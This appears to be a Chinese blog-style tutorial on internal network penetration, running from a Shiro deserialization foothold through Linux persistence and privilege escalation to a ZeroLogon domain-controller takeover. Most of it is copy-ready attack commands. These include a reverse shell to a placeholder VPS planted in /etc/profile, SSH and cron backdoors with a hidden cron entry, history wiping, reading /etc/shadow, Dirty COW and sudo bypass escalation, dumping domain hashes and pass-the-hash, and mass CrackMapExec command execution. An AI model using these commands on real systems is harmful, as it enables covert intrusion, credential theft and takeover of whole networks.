内网渗透初探(三) | 查缺补漏
字数 1049 2025-08-24 20:49:22

内网渗透技术详解:从Linux入侵到域控提权

一、外网打点技术

1. Shiro反序列化漏洞利用

识别特征

  • 典型的Shiro框架登录界面
  • Cookie中包含rememberMe字段

利用工具

二、Linux权限维持技术

1. 隐藏历史记录技术

方法

  • 命令前加空格:[空格]cat /etc/passwd
  • 禁用历史记录:set +o history(恢复:set -o history
  • 删除特定历史记录:history -d [num]
  • 清除全部历史记录:
    echo > ~/.bash_history
    history -c
    

2. SSH公钥后门

步骤

  1. 生成SSH密钥:ssh-keygen -t rsa(三次回车)
  2. 将公钥写入目标:cat id_rsa.pub >> ~/.ssh/authorized_keys
  3. 免密登录:ssh root@目标IP

3. SSH软连接后门

原理:利用PAM认证配置中的auth sufficient pam_rootok.so

实现

ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=10022

连接:任意密码通过指定端口(如10022)SSH登录

4. 计划任务后门

设置

(crontab -l;printf "*/3 * * * * /bin/bash /tmp/cron.sh;\rno crontab for `whoami`%100c\n")|crontab -

隐藏:通过特殊格式隐藏计划任务条目

5. 环境变量后门

植入方法

echo 'bash -i >& /dev/tcp/[vps-ip]/[port] 0>&1' >> /etc/profile

触发:系统重启后自动反弹shell

三、Linux信息收集

1. 账户信息收集

whoami
id
cat /etc/passwd
cat /etc/shadow

2. 网络信息收集

ifconfig
netstat -anlp
arp -a
route -n

3. 进程信息

ps -ef

4. 系统信息

uname -a
rpm -qa

5. 凭证收集

cat /root/.bash_history
cat ~/.bash_history
w

四、Linux提权技术

1. 内核漏洞提权

步骤

  1. 使用linux-exploit-suggester识别可用漏洞
  2. 下载对应exp(如脏牛CVE-2016-5195)
  3. 编译执行:
    gcc -pthread dirty.c -o dirty -lcrypt
    ./dirty
    
  4. 获取root权限账户

2. SUID提权

发现SUID文件

find / -perm -u=s -type f 2>/dev/null

利用find命令提权

find / -exec whoami \;

3. Sudo配置错误提权

利用方法

sudo -u#-1 id
sudo -u#-1 whoami

五、横向移动技术

CVE-2020-1472 (ZeroLogon)域控攻击

工具准备

攻击步骤

  1. 获取域控信息

    net group "Domain Controllers" /domain
    
  2. 置空域控密码

    python3 cve-2020-1472-exploit.py -n 域控主机名 -t 域控IP
    
  3. 获取域控Hash

    python3 secretsdump.py xxx.cool/AD\$@192.168.30.128 -no-pass
    
  4. PTH攻击获取shell

    python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:f1de694efa543bb780da59c049541ea3 Administrator@192.168.30.128
    
  5. 还原域控密码

    python3 reinstall_original_pw.py AD 192.168.30.128 75f490ed04ba66f04e0e947a185679bd
    

六、扩大战果

使用CrackMapExec批量攻击

安装

apt-get install crackmapexec

攻击命令

proxychains crackmapexec smb 192.168.30.1/24 -u administrator -H f1de694efa543bb780da59c049541ea3 -d xxx.cool -x whoami

参数说明

  • -u:指定用户名
  • -H:指定NTLM Hash
  • -d:指定域
  • -x:执行系统命令

通过以上方法可以快速在内网中横向移动,控制多台主机。

内网渗透技术详解:从Linux入侵到域控提权 一、外网打点技术 1. Shiro反序列化漏洞利用 识别特征 : 典型的Shiro框架登录界面 Cookie中包含 rememberMe 字段 利用工具 : 使用 j1anFen/shiro_ attack 工具进行攻击 直接上传冰蝎(Behinder)Webshell 二、Linux权限维持技术 1. 隐藏历史记录技术 方法 : 命令前加空格: [空格]cat /etc/passwd 禁用历史记录: set +o history (恢复: set -o history ) 删除特定历史记录: history -d [num] 清除全部历史记录: 2. SSH公钥后门 步骤 : 生成SSH密钥: ssh-keygen -t rsa (三次回车) 将公钥写入目标: cat id_rsa.pub >> ~/.ssh/authorized_keys 免密登录: ssh root@目标IP 3. SSH软连接后门 原理 :利用PAM认证配置中的 auth sufficient pam_rootok.so 实现 : 连接 :任意密码通过指定端口(如10022)SSH登录 4. 计划任务后门 设置 : 隐藏 :通过特殊格式隐藏计划任务条目 5. 环境变量后门 植入方法 : 触发 :系统重启后自动反弹shell 三、Linux信息收集 1. 账户信息收集 2. 网络信息收集 3. 进程信息 4. 系统信息 5. 凭证收集 四、Linux提权技术 1. 内核漏洞提权 步骤 : 使用 linux-exploit-suggester 识别可用漏洞 下载对应exp(如脏牛CVE-2016-5195) 编译执行: 获取root权限账户 2. SUID提权 发现SUID文件 : 利用find命令提权 : 3. Sudo配置错误提权 利用方法 : 五、横向移动技术 CVE-2020-1472 (ZeroLogon)域控攻击 工具准备 : CVE-2020-1472利用工具 Impacket工具包 攻击步骤 : 获取域控信息 : 置空域控密码 : 获取域控Hash : PTH攻击获取shell : 还原域控密码 : 六、扩大战果 使用CrackMapExec批量攻击 安装 : 攻击命令 : 参数说明 : -u :指定用户名 -H :指定NTLM Hash -d :指定域 -x :执行系统命令 通过以上方法可以快速在内网中横向移动,控制多台主机。